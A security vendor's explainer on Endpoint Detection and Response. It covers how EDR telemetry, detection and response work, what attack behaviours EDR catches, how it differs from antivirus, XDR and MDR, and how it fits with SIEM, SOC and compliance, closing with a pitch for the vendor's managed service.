What Is EDR (Endpoint Detection and Response)

An EDR (Endpoint Detection and Response) is the agent and console that watch in real time what is happening on every company endpoint (laptops, desktops, servers) to detect suspicious behaviour, contain the attacker and leave forensic evidence of the incident. It replaces traditional antivirus when the attack no longer relies on known malicious files but on the abuse of legitimate tools, living off the land techniques, obfuscated PowerShell scripts and lateral movements that a signature-based AV simply does not see.

This guide explains what an EDR is, how it works internally, what it detects, how it differs from antivirus, XDR and MDR, and how it fits with SIEM and SOC in a modern defensive architecture.

What an EDR is: technical definition

An EDR system is a security solution that deploys a lightweight agent on every endpoint and reports continuously to a central console with three families of information:

• Telemetry. Created processes, network connections, file access, registry changes, calls to sensitive APIs, executed PowerShell commands, loaded drivers.
• Detections. Alerts produced by behaviour engines, machine learning, YARA rules and mapping to MITRE ATT&CK techniques.
• Response actions. Network isolate the machine, kill processes, block binaries by hash, recover files, run forensic scripts.

The essential difference with traditional antivirus is one of philosophy: an AV decides whether a file is malicious by comparing its hash or signature against a database. An EDR observes the behaviour of the file (and of every process on the system) at runtime, correlates it with historical telemetry and decides whether the chain of events looks like an attack, even when the binary is fully legitimate.

How an EDR works under the hood

The operational flow of any modern EDR (CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne, Bitdefender GravityZone, TrendMicro Vision One, Palo Alto Cortex XDR) follows the same four blocks:

1. Telemetry capture. The agent hooks into kernel callbacks, ETW (Event Tracing for Windows), eBPF on Linux and system APIs to record low-level events without the user noticing meaningful impact.
2. Local plus cloud analysis. The agent runs lightweight detections on the device (heuristics, embedded ML, IoC blocklist, matching against known CVEs) and sends the telemetry to the vendor's cloud for cross-tenant correlation and heavier models.
3. Detection and prioritisation. The vendor platform maps each event to MITRE ATT&CK techniques, groups related events into incidents and prioritises them by severity. What lands on the analyst's screen is not "event 134", it's "credential dumping attempt from a Microsoft-signed process".
4. Response. The analyst (or SOAR automation) executes actions from the console: isolate the endpoint, kill processes, collect artifacts, restore files, mark IoCs for fleet-wide blocking.

What separates an EDR from an AV is this correlation layer. An AV sees cmd.exe /c whoami run and ignores it because cmd.exe is signed. An EDR sees cmd.exe /c whoami run right after a Word macro opened a connection to a never-seen IP, launched obfuscated PowerShell and added a persistence registry key, and stops it as a single attack chain.

What an EDR actually detects

The EDR covers the malware families that traditional antivirus does not see (RATs, modern infostealers, fileless attacks) and focuses on five behaviour families that justify having one in a real company:

1. Living off the land. Abuse of legitimate system binaries (PowerShell, wmic, certutil, bitsadmin, mshta, regsvr32) to execute payloads, download files or pivot. An AV sees nothing strange because the binaries are signed; the EDR catches the anomalous usage pattern.
2. Credential dumping. Access to the lsass.exe process memory to extract credentials (Mimikatz and derivatives). It is the first technique an attacker tries after taking an endpoint and detection for it is in every mature EDR.
3. Persistence. New services, scheduled tasks, registry Run keys, DLL hijacking, image file execution options, abuse of scheduled tasks. The EDR keeps an inventory of these points and warns when suspicious changes appear.
4. Lateral movement. Use of SMB, WinRM, RDP, PsExec or WMI to jump between machines. Combined with identity telemetry (Active Directory, Entra ID), the EDR reconstructs the movement graph.
5. Ransomware. Mass file encryption, shadow copy deletion, backup service termination, communication with known C2. Modern EDRs stop ransomware in the first seconds of encryption and the ones with rollback recover the affected files.

On top of this comes retrospective threat hunting: the analyst runs queries over weeks or months of telemetry searching for patterns that were not in the rules when the events happened. That is what makes the EDR useful after an incident, not only during it.

EDR compared to traditional antivirus

Three differences that change everything:

• Detection. AV finds malicious files by signature or hash; EDR finds behaviour chains, even when the binaries are legitimate.
• Telemetry. AV generates alerts; EDR generates continuous telemetry that lets you reconstruct any later event. Without EDR, after an incident you only have whatever logs the victim happened to keep.
• Response. AV quarantines the file; EDR isolates the machine, kills processes, collects forensic artifacts and blocks IoCs across the whole fleet.

Modern AV (NGAV or next-gen antivirus) has incorporated behaviour capabilities, but EDR remains the category that adds continuous telemetry and orchestrated response. In practice major vendors integrate AV plus EDR into the same agent: you install one product that covers both layers.

EDR vs XDR vs MDR: clearing the acronym soup

Three acronyms that get mixed up routinely:

• EDR (Endpoint Detection and Response). The detection and response layer over endpoints. Deep telemetry on PCs and servers.
• XDR (Extended Detection and Response). The extension of EDR to other telemetry sources: network, identity, email, cloud. Integrates data from several products of the same vendor (or third parties) into a single view. Microsoft Defender XDR is the clearest example: it combines Defender for Endpoint, for Identity, for Office 365 and for Cloud Apps in one console.
• MDR (Managed Detection and Response). The managed service wrapped around an EDR (or XDR). A provider runs the platform 24/7 with their own analysts, delivers triaged alerts and, in many cases, executes initial containment. It is what companies without an internal SOC contract.

Quick rule: EDR is the product, XDR is the extended platform, MDR is the service.

EDR platforms most common in the Spanish market

The five families that appear in any serious evaluation:

• CrowdStrike Falcon. Widely seen as the technical leader. Very mature detections, rich telemetry, threat graph in the cloud. Expensive licensing model but the benchmark.
• Microsoft Defender for Endpoint. Attractive when the company is already on Microsoft 365 E5 (included) or E3 plus add-on. Native integration with Entra ID, Defender XDR and Sentinel.
• SentinelOne Singularity. Best known for ransomware rollback. Lower operational footprint for mid-sized companies.
• Bitdefender GravityZone. Strong in mid-market and European partners. Mature MDR model.
• TrendMicro Vision One. Wide coverage, strong in Latin America and Spain, powerful XDR integration.
• Cortex XDR (Palo Alto). Attractive when the company already has a Palo Alto firewall. Good network analysis.
• Sophos Intercept X. Mid-market and MSP, competitive price-to-coverage ratio.
• ESET Inspect, Cybereason, Elastic Endpoint Security. Other options that appear in tenders depending on context.

Don't choose by brand. Choose by integration with your current stack, internal operating capability and licensing model against your real endpoint volume.

EDR, SIEM and SOC: how they fit together

A common mistake is to treat the EDR as a replacement for the SIEM or the SOC. It is not. Each piece has its role:

• The EDR is the deep telemetry and response layer over endpoints. It is the finest eye on what happens inside every machine.
• The SIEM is the broad correlation layer that ties EDR, firewall, identity, cloud, applications and more. It gives a cross-domain view when the attack crosses boundaries.
• The SOC is the team that operates both: it triages EDR alerts, runs queries on the SIEM, decides when to escalate and executes the response.

The architecture that works in a modern company combines all three: EDR as deep detector, SIEM as correlator, SOC as the human brain. Skipping the SIEM works in small companies; skipping the SOC never works, alerts from the EDR with nobody to attend them are expensive noise.

Common mistakes when deploying an EDR

Three usual ways to burn the budget:

1. Install the agent and stop there. No tailored detection rules, no tuning, no response. The EDR turns into another console nobody looks at.
2. Exclude too much for fear of false positives. Every exclusion is a blind spot. Sensible exclusions get documented, justified and reviewed; the ones done "just because" become exactly where the attacker hides persistence.
3. No connection between EDR, SIEM and SOC. The rich telemetry captured by the EDR loses 70% of its value without cross-correlation with identity, network and cloud. With nobody operating the alerts, the EDR is a post-mortem forensic log, not a detection system.

EDR and compliance

The EDR appears as technical evidence in several frameworks that apply to Spanish companies:

• NIS2 (article 21.2.h). Risk management measures require detection and response capabilities proportional to the risk. EDR plus SOC is the canonical implementation.
• ENS (Spanish Royal Decree 311/2022). Measures op.mon.1 (intrusion detection) and op.exp.10 (activity logging) presume operational endpoint telemetry.
• ISO 27001:2022 (controls A.8.7 Protection against malware and A.8.16 Monitoring activities). Require detection mechanisms on endpoints with systematic review.
• PCI DSS v4.0 (req. 5 and 11). Maintenance of up-to-date anti-malware capabilities and monitoring of security events on systems that process card data.

Frequently asked questions about EDR

What is the difference between EDR and antivirus?

Traditional antivirus finds malicious files by signature; EDR detects chains of suspicious behaviour, captures continuous telemetry and allows orchestrated response (isolate, kill processes, collect artifacts). In practice modern EDRs include antivirus functionality inside the same agent.

Does EDR replace the firewall, SIEM or backup?

No. EDR covers detection and response on endpoints. The firewall protects the network, the SIEM correlates events from the whole organisation, the backup makes recovery from an incident possible. They are complementary pieces in a defensive architecture.

How much does an EDR cost?

Pricing is per endpoint per month and varies a lot by vendor, volume and add-ons (XDR, MDR, threat intel, managed threat hunting). Reasonable options for mid-market sit in the low single-digit euros per endpoint per month range; top-tier options multiply that figure. The sensible call is to run a POC on your own environment before committing, not to rely on generic comparison tables. For broader pricing logic see penetration testing pricing in Spain.

Do I need a SOC to run an EDR?

Yes, in some form. An EDR without anyone attending to the alerts becomes a console nobody looks at. If there is no internal SOC, the usual move is to contract MDR (managed service over the EDR) or a managed cybersecurity provider that operates the platform 24/7.

Does the EDR detect ransomware?

Yes. Modern EDRs detect and block the typical ransomware patterns (mass encryption, shadow copy deletion, communication with C2). The ones with rollback (SentinelOne, some CrowdStrike configurations) recover files encrypted in the seconds before the block triggered. Combined with offline backup and a watching SOC, it significantly reduces incident impact.

Does EDR work on macOS and Linux?

Enterprise EDRs (CrowdStrike, SentinelOne, Defender, Bitdefender, TrendMicro) cover Windows, macOS and the main Linux distributions. Technical coverage varies: Windows has the richest telemetry; Linux and macOS usually have fewer predefined detections but capture critical events (processes, network, file integrity, Linux audit log). In environments where most servers are Linux, validate the specific EDR coverage before committing.

How do you measure whether an EDR is being useful?

Three operational metrics: MTTD (mean time to detect from the first suspicious event), MTTR (mean time to respond until containment), and MITRE ATT&CK coverage (what percentage of techniques relevant to your sector are covered by active rules). An EDR without these metrics in place is an EDR nobody is really operating.

Related resources

• What is a SOC (Security Operations Center): the team and processes that operate the EDR.
• What is SIEM and how it works: the correlation platform that connects EDR with identity, network and cloud.
• What is a CVE: vulnerabilities explained: how CVE feeds drive EDR detection of known exploits.
• What is a penetration test: how pentesting validates real EDR coverage.

EDR at Secra

At Secra we run the EDR inside our managed cybersecurity service, with the platform operated by our team, rules adapted to the client's sector and continuous detection engineering so coverage grows with the organisation. If you want a concrete proposal for your endpoint volume and current stack, get in touch through contact.